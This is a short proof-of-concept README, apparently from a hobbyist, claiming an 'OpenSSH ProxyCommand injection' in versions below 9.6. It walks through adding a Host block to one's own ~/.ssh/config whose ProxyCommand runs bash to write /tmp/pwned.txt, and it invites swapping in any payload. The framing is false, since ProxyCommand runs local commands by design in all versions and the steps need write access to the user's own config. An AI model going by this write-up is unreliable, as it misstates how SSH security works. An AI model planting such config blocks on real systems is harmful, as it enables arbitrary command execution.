### Objective

1. Exploit OpenSSH's ProxyCommand injection to:

2. Create a file (e.g., /tmp/pwned.txt)

3. Insert custom content into it (e.g., You’ve been hacked via ProxyCommand)

### Prerequisites
1. Any linux based system with OpenSSH version < 9.6
2. Access to the system via SSH (Credentialed)

### Procedure
1. Check for the OpenSSH version with:
   ```
   ssh -V
   ```
2. Check for config file in:
    ```
   .ssh folder
   ls -lah ~/.ssh
   ```
3. If config file is available, skip to 4. Else, please create one with:
   ```
   mkdir -p ~/.ssh
   cp ~/.ssh/config ~/.ssh/config.bak 2>/dev/null
   touch ~/.ssh/config
   ```
4. Edit the config file using:
   ```
   nano ~/.ssh/config
   ```
5. Insert the following block:
   ```
   Host pwned-target
    HostName 127.0.0.1
    ProxyCommand bash -c 'echo "You’ve been hacked via ProxyCommand" > /tmp/pwned.txt'
   ```
      Here, the __pwned-target__ can be any name you want.
      IP address can be any IP.  It's just a __placeholder__. The payload execution happens before that address is even contacted.
6. Now close the nano by saving it using:
   ```
   ctrl+o
   ```
   ```
   ctrl+x
   ```
7. In the terminal run:
   ```
   ssh pwned-target
   ```
     Here __pwned-target__ is the Host we set in the config file which will trigger the proxy command
   ```
   'echo "You’ve been hacked via ProxyCommand" > /tmp/pwned.txt'
   ```
   by creating a file __pwned.txt__ in the __/tmp__ folder.
9. To validate the exploit being run successfully, you can check it via:
   ```
   cd /tmp
   ls -lah
   cat pwned.txt
   ```  
10. You can change the payload section ```ProxyCommand```.
If you like this PoC, please share it and follow me on twitter @[saarcastified](https://x.com/saarcastified)